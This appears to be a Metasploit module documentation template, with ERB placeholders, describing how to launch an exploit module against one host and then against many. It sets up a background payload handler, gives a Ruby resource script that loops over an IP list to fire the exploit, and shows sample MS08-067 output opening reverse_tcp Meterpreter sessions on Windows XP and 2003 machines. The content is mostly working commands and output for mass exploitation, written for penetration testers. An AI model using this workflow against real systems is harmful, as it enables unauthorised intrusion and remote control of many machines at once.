123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100 |
- **Using <%= mod.shortname %> against a single host**
- Normally, you can use <%= mod.fullname %> this way:
- ```
- msf > use <%= mod.fullname %>
- msf <%= mod.type %>(<%= mod.shortname %>) > show targets
- ... a list of targets ...
- msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
- msf <%= mod.type %>(<%= mod.shortname %>) > show options
- ... show and set options ...
- msf <%= mod.type %>(<%= mod.shortname %>) > exploit
- ```
- **Using <%= mod.shortname %> against multiple hosts**
- But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
- First, create a list of IPs you wish to exploit with this module. One IP per line.
- Second, set up a background payload listener. This payload should be the same as the one your
- <%= mod.shortname %> will be using:
- 1. Do: ```use exploit/multi/handler```
- 2. Do: ```set PAYLOAD [payload]```
- 3. Set other options required by the payload
- 4. Do: ```set EXITONSESSION false```
- 5. Do: ```run -j```
- At this point, you should have a payload listening.
- Next, create the following script. Notice you will probably need to modify the ip_list path, and
- payload options accordingly:
- ```
- <ruby>
- #
- # Modify the path if necessary
- #
- ip_list = '/tmp/ip_list.txt'
- File.open(ip_list, 'rb').each_line do |ip|
- print_status("Trying against #{ip}")
- run_single("use <%= mod.fullname %>")
- run_single("set RHOST #{ip}")
- run_single("set DisablePayloadHandler true")
- #
- # Set a payload that's the same as the handler.
- # You might also need to add more run_single commands to configure other
- # payload options.
- #
- run_single("set PAYLOAD [payload name]")
- run_single("run")
- end
- </ruby>
- ```
- Next, run the resource script in the console:
- ```
- msf > resource [path-to-resource-script]
- ```
- And finally, you should see that the exploit is trying against those hosts similar to the following
- MS08-067 example:
- ```
- msf > resource /tmp/exploit_hosts.rc
- [*] Processing /tmp/exploit_hosts.rc for ERB directives.
- [*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
- [*] Trying against 192.168.1.80
- RHOST => 192.168.1.80
- DisablePayloadHandler => true
- PAYLOAD => windows/meterpreter/reverse_tcp
- LHOST => 192.168.1.199
- [*] 192.168.1.80:445 - Automatically detecting the target...
- [*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
- [*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
- [*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
- [*] Sending stage (957999 bytes) to 192.168.1.80
- [*] Trying against 192.168.1.109
- RHOST => 192.168.1.109
- DisablePayloadHandler => true
- PAYLOAD => windows/meterpreter/reverse_tcp
- LHOST => 192.168.1.199
- [*] 192.168.1.109:445 - Automatically detecting the target...
- [*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
- [*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
- [*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
- [*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
- [*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
- [*] Sending stage (957999 bytes) to 192.168.1.109
- [*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
- ```
|